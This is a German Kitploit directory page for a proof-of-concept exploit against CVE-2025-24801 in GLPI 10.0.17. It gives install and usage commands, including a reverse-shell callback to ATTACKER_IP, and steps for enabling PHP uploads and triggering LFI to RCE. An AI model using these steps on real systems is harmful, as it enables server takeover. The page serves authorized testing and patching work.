Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24801 — Proof-of-Concept-Exploit für CVE-2025-24801, eine LFI-zu-RCE-Schwachstelle in GLPI 10.0.17. Automatisiert den Login, aktiviert PHP-Uploads und lädt eine Reverse Shell für autorisierte Sicherheitstests hoch. | Kitploit
Tools/GitHubGitHub/fatkz/cve-2025-24801
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubfatkz/cve-2025-24801

CVE-2025-24801

Proof-of-Concept-Exploit für CVE-2025-24801, eine LFI-zu-RCE-Schwachstelle in GLPI 10.0.17. Automatisiert den Login, aktiviert PHP-Uploads und lädt eine Reverse Shell für autorisierte Sicherheitstests hoch.

Repository anzeigen
3116vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24801 PoC für GLPI RCE

Dieses Repository enthält ein Proof-of-Concept-Skript (poc.py), das CVE-2025-24801 ausnutzt, eine LFI-zu-RCE-Schwachstelle in GLPI 10.0.17. Es automatisiert:

  • Anmelden bei GLPI
  • Aktivieren von .php-Uploads durch Aktualisieren der Dokumenttyp-Einstellungen
  • Hochladen einer PHP-Reverse-Shell über den AJAX-Datei-Upload-Endpunkt

🛠️ Installation

git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt

🚀 Verwendung

python3 poc.py \
  --url https://target.example.com/glpi \
  --user TECHNICIAN_USER \
  --password "PASSWORD" \
  --lhost ATTACKER_IP \
  --lport 4444
  • --url: Basis-URL der GLPI-Instanz (z. B. https://example.com/glpi)
  • --user / --password: Gültige GLPI-Techniker-Anmeldedaten
  • --lhost / --lport: Angreifer-IP und -Port für den Reverse-Shell-Listener

Das Skript verwendet standardmäßig automatisch --doc-id 1, um den ersten Dokumenttyp zu aktualisieren.

Nach der Ausführung wird das Skript:

  1. Anmelden und eine Sitzung einrichten
  2. Aktivieren von .php-Uploads durch Aktualisieren der Dokumenttyp-ID 1
  3. Hochladen von exploit.php mit einem PHP-Reverse-Shell-Payload

Sie müssen dann manuell die LFI auslösen, indem Sie den hochgeladenen Dateinamen im PDF-Schriftarteninclude angeben (z. B. über die Berichtsexportfunktion), um RCE zu erreichen.

📑 Funktionsweise

  1. Anmeldung: Extrahiert das CSRF-Token aus /front/login.php und sendet Anmeldedaten, um sich zu authentifizieren.
  2. PHP-Uploads aktivieren: Ruft /front/documenttype.form.php?id=1 ab, parst das CSRF-Token und fügt php zu den erlaubten Erweiterungen hinzu.
  3. Shell hochladen: Ruft /front/ticket.form.php für ein CSRF-Token ab, verwendet dann /ajax/fileupload.php (mit X-Requested-With: XMLHttpRequest), um eine PHP-Reverse-Shell hochzuladen.
  4. RCE auslösen: Manuell die PDF-Schriftarten-LFI aufrufen, indem der hochgeladene Shell-Dateiname im Parameter pdffont beim Berichtsexport angegeben wird.

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.


Erstellt für Bildungs- und autorisierte Pentesting-Zwecke.

Tool herunterladen